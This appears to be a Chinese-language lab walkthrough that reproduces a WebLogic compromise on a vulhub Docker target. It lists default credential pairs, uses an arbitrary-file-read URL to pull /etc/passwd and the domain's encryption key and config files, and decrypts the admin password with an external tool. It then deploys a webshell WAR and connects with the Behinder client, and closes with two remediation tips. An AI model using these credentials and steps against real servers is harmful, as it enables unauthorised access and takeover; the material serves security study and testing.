一、漏洞介绍
0x01 weblogic常见弱口令
system/password
weblogic/weblogic
admin/security
joe/password
mary/password
system/security
wlcsystem/wlcsystem
wlpisystem/wlpisystem
weblogic/Oracle@123
0x02 漏洞介绍
CVE-2019-2618这个漏洞是利用任意文件读取来获取weblogic的弱口令登录进入后台,然后通过上传getshell,通过构造任意文件下载漏洞环境读取到后台用户名和密码,然后登陆进后台,上传webshell。
二、影响范围
WebLogic 10.3.6.0、12.1.3.0、12.2.1.3
三、漏洞复现
0x01 环境搭建
(1):切换目录
cd /vulhub/weblogic/weak_password

(2):开启环境
docker-compose up -d

0x02 漏洞复现
(1):任意文件读取
http://IP:7001/hello/file.jsp?path=/etc/passwd


(2):读取密钥
weblogic密码使用AES加密,这是一种对称加密算法,对称加密可解密,只需要找到用户的密文与加密时的密钥即可。这两个文件均位于base_domain下,名为SerializedSystemIni.dat和config.xml。SerializedSystemIni.dat是一个二进制文件,所以一定要用burpsuite来读取,用浏览器直接下载可能引入一些干扰字符。在burp里选中读取到的那一串乱码,这就是密钥,右键copy to file就可以保存成一个文件:
security/SerializedSystemIni.dat

(3):右键保存到文件

(4):读取密钥
config/config.xml

(5):下载工具进行解密
下载链接:https://github.com/TideSec/DecryptWeblogicPassword
使用其中的工具5进行解密

发现后台是弱口令Oracle@123
(6):使用账号登录后台
weblogic后台默认地址:http://IP:7001/console/
用户名:weblogic 密码:Oracle@123

(7):成功登录后台

(8):生成war包
war是一个可以直接运行的web模块,通常用于网站,打成包部署到容器中。war包放置到web目录下之后,可以自动解压,就相当于发布了。简单来说,war包是JavaWeb程序打的包,war包里面包括写的代码编译成的class文件,依赖的包,配置文件,所有的网站页面,包括html,jsp等等。一个war包可以理解为是一个web项目,里面是项目的所有东西。
jar -cvf shell.war *

(9):部署war包
部署-->安装-->上载文件-->浏览-->下一步-->下一步-->下一步-->完成







(10):访问war包
http://IP:7001/war包名称/shell.jsp

(11):使用冰蝎马进行连接
默认密码是rebeyond

(12):成功getshell

四、修复建议
1.修改weblogic默认密码
2.升级到更新版本